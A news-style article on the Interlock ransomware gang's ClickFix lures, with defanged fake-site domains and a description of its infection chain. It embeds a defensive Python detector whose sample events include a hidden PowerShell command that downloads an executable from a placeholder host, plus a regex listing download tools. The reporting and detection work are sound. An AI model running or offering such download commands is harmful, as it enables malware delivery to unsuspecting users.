Interlock Ransomware Gang Unleashes Deceptive ClickFix Attacks on Corporations

2025-04-18

Author: Daniel

Interlock's New Attacks Revealed!

The infamous Interlock ransomware gang is ramping up its operations by employing innovative ClickFix attacks designed to deceive corporate networks. By masquerading as essential IT tools, they are successfully breaching systems and deploying file-encrypting malware.

What is ClickFix?

ClickFix is a clever social engineering ploy that tricks unsuspecting victims into executing harmful PowerShell commands, all under the guise of fixing a supposed error or performing a self-verification. This nefarious tactic results in the sinister installation of malware on targeted devices.

A Rise in Ransomware Tactics

This is neither the first nor the last time ClickFix has been associated with ransomware infections. However, Interlock’s use of the method marks a concerning trend among cybercriminals, showing their increasing sophistication in exploiting human error.

Interlock: The New Face of Ransomware

Launched in late September 2024, Interlock targets FreeBSD servers and Windows systems without operating as a traditional ransomware-as-a-service. Yet, they maintain a disturbing presence on the dark web with a data leak portal, exerting pressure on victims with ransom demands ranging from hundreds of thousands to multi-million-dollar sums.

From Fake Updates to ClickFix Magic!

Previously, Interlock relied on fake browser and VPN client updates to execute their malware. But since January 2025, they've pivoted to the ClickFix strategy, cleverly using at least four deceptive URLs that feature fake CAPTCHA prompts, urging users to run a command to verify their identities.

A Closer Look at the Deception

These fake sites cleverly imitate legitimate platforms like Microsoft and Advanced IP Scanner, with URLs specifically crafted to mislead:

- microsoft-msteams[.]com/additional-check.html
- microstteams[.]com/additional-check.html
- ecologilives[.]com/additional-check.html
- advanceipscaner[.]com/additional-check.html

Among these, the last URL proved particularly dangerous, directing victims to download a malicious installer.

How the Infection Happens!

By clicking the 'Fix it' button, victims unknowingly copy a harmful PowerShell command to their clipboard. Once executed, this command downloads a 36MB PyInstaller payload while simultaneously opening the legitimate Advanced IP Scanner website to mask the malicious activity.

Malware on the Rise!

This payload installs what appears to be a legitimate software copy while secretly executing an embedded PowerShell script that operates stealthily, registering a Run key in the Windows Registry for persistence and collecting vital system information.
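The chain just described leaves two host-level traces a defender can correlate: a PowerShell process launched from the desktop shell with a download command (the pasted ClickFix command), followed by a Run-key write from that same process. The detection logic below is an added example written for this article, not code from the article or from any vendor; the event records are constructed, Sysmon-style samples with assumed field names, and the download URL is a placeholder.

```python
import re
from typing import Dict, List

# Constructed, Sysmon-style records (assumed field names); not real telemetry.
# id 1 = process creation, id 13 = registry value set.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://placeholder.invalid/setup.exe -OutFile $env:TEMP\\s.exe"'},
    {"id": 13, "pid": 4120,
     "target": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    # Benign PowerShell from the same parent: no download cmdlet, so it is not flagged.
    {"id": 1, "pid": 5310, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell Get-Date"},
    {"id": 13, "pid": 5310,
     "target": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\Tool"},
]

# Download / encoded-command indicators typical of pasted ClickFix commands.
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer|encodedcommand)\b"
    r"|\s-enc\b", re.IGNORECASE)
RUNKEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)

def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")

def detect(events: List[Dict]) -> List[Dict]:
    """Flag ClickFix-style PowerShell launches and mark those that then add a Run key."""
    suspects: Dict[int, int] = {}  # pid -> index into alerts
    alerts: List[Dict] = []
    for ev in events:
        if (ev["id"] == 1 and is_powershell(ev["image"])
                and ev["parent"].lower().endswith("\\explorer.exe")
                and DOWNLOAD_RE.search(ev["cmdline"])):
            suspects[ev["pid"]] = len(alerts)
            alerts.append({"pid": ev["pid"], "stage": "clickfix_launch", "persistence": False})
        elif ev["id"] == 13 and RUNKEY_RE.search(ev["target"]) and ev["pid"] in suspects:
            # Correlating by pid keeps ordinary Run-key writes from other processes out of the alert.
            alerts[suspects[ev["pid"]]]["persistence"] = True
            alerts[suspects[ev["pid"]]]["run_value"] = ev["target"]
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Correlating the Run-key write with the originating PowerShell process is what separates this chain from routine administrative scripting; either event on its own is common in enterprise telemetry.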

RAT Deployment and Beyond!

Observations suggest Interlock's command and control (C2) server responds with a range of malicious payloads, including LummaStealer, BerserkStealer, and its own Interlock RAT. This malware can exfiltrate files, execute commands, and load malicious DLLs.

The Lateral Move and Data Exfiltration

After gaining initial access, Interlock operators often utilize stolen credentials for lateral movement, frequently employing RDP alongside tools like PuTTY, AnyDesk, and LogMeIn during their attacks. Their endgame involves data exfiltration, uploading stolen files to Azure Blobs controlled by attackers.

A Daily Threat!

The Windows variant of Interlock is scheduled to run daily at 08:00 PM. Because the encryptor filters files by extension, these repeated runs do not encrypt already-encrypted files a second time; the daily task instead serves as an additional redundancy measure.

Evolving Ransom Note Strategies

Recent ransom notes have evolved, focusing more on the legal ramifications of data breaches and the dire consequences if stolen information is leaked to the public.

ClickFix: A Popular Ransomware Tool!

The ClickFix attack method has now been adopted by a broader spectrum of threat actors, including various ransomware gangs and even North Korean hackers, making it one of the most concerning tactics in the cybercrime landscape today.